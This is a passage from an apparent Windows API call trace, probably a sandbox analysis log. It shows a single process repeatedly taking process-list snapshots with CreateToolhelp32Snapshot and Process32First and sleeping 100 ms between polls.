hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.111] Sleep (dwMilliseconds=0x64) [0178.122] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0178.132] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.205] Sleep (dwMilliseconds=0x64) [0178.214] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0178.224] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.276] Sleep (dwMilliseconds=0x64) [0178.281] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0178.295] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.344] Sleep (dwMilliseconds=0x64) [0178.348] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0178.358] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.415] Sleep (dwMilliseconds=0x64) [0178.423] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0178.433] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.485] Sleep (dwMilliseconds=0x64) [0178.495] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0178.507] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.556] Sleep (dwMilliseconds=0x64) [0178.565] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0178.575] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.670] Sleep (dwMilliseconds=0x64) [0178.677] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0178.687] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.749] Sleep (dwMilliseconds=0x64) [0178.752] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0178.766] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.835] Sleep (dwMilliseconds=0x64) [0178.849] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0178.869] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.917] Sleep (dwMilliseconds=0x64) [0178.924] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0178.935] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.994] Sleep (dwMilliseconds=0x64) [0178.997] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0179.007] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.064] Sleep (dwMilliseconds=0x64) [0179.068] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0179.089] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.186] Sleep (dwMilliseconds=0x64) [0179.192] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0179.205] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.254] Sleep (dwMilliseconds=0x64) [0179.272] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0179.281] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.331] Sleep (dwMilliseconds=0x64) [0179.339] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0179.349] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.409] Sleep (dwMilliseconds=0x64) [0179.417] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0179.430] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.516] Sleep (dwMilliseconds=0x64) [0179.520] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0179.529] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.575] Sleep (dwMilliseconds=0x64) [0179.576] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0179.586] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.644] Sleep (dwMilliseconds=0x64) [0179.646] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0179.656] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.704] Sleep (dwMilliseconds=0x64) [0179.709] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0179.721] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.798] Sleep (dwMilliseconds=0x64) [0179.813] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0179.825] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.877] Sleep (dwMilliseconds=0x64) [0179.879] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0179.894] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.950] Sleep (dwMilliseconds=0x64) [0179.953] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0179.967] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.030] Sleep (dwMilliseconds=0x64) [0180.040] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0180.058] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.113] Sleep (dwMilliseconds=0x64) [0180.115] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0180.129] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.246] Sleep (dwMilliseconds=0x64) [0180.248] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0180.263] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.315] Sleep (dwMilliseconds=0x64) [0180.316] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0180.340] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.404] Sleep (dwMilliseconds=0x64) [0180.405] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0180.422] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.492] Sleep (dwMilliseconds=0x64) [0180.493] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0180.508] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.565] Sleep (dwMilliseconds=0x64) [0180.567] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0180.584] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.652] Sleep (dwMilliseconds=0x64) [0180.655] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0180.669] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.738] Sleep (dwMilliseconds=0x64) [0180.740] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0180.752] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.830] Sleep (dwMilliseconds=0x64) [0180.833] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0180.847] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.913] Sleep (dwMilliseconds=0x64) [0180.915] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0180.929] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.041] Sleep (dwMilliseconds=0x64) [0181.045] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0181.063] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.126] Sleep (dwMilliseconds=0x64) [0181.129] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0181.145] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.269] Sleep (dwMilliseconds=0x64) [0181.271] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0181.283] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.348] Sleep (dwMilliseconds=0x64) [0181.349] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0181.362] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.420] Sleep (dwMilliseconds=0x64) [0181.421] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0181.432] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.485] Sleep (dwMilliseconds=0x64) [0181.487] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0181.501] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.555] Sleep (dwMilliseconds=0x64) [0181.557] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0181.573] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.622] Sleep (dwMilliseconds=0x64) [0181.634] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0181.648] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.706] Sleep (dwMilliseconds=0x64) [0181.708] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0181.719] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.802] Sleep (dwMilliseconds=0x64) [0181.804] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0181.817] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.891] Sleep (dwMilliseconds=0x64) [0181.893] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0181.909] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.980] Sleep (dwMilliseconds=0x64) [0181.983] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0181.998] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.066] Sleep (dwMilliseconds=0x64) [0182.068] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0182.084] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.152] Sleep (dwMilliseconds=0x64) [0182.154] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0182.207] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.278] Sleep (dwMilliseconds=0x64) [0182.280] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0182.293] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.348] Sleep (dwMilliseconds=0x64) [0182.351] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0182.368] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.439] Sleep (dwMilliseconds=0x64) [0182.441] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0182.454] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.526] Sleep (dwMilliseconds=0x64) [0182.528] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0182.543] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.623] Sleep (dwMilliseconds=0x64) [0182.626] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0182.642] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.715] Sleep (dwMilliseconds=0x64) [0182.717] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0182.732] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.813] Sleep (dwMilliseconds=0x64) [0182.815] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0182.831] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.901] Sleep (dwMilliseconds=0x64) [0182.903] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0182.934] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.014] Sleep (dwMilliseconds=0x64) [0183.016] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0183.036] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.111] Sleep (dwMilliseconds=0x64) [0183.119] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0183.134] Process32First (in: 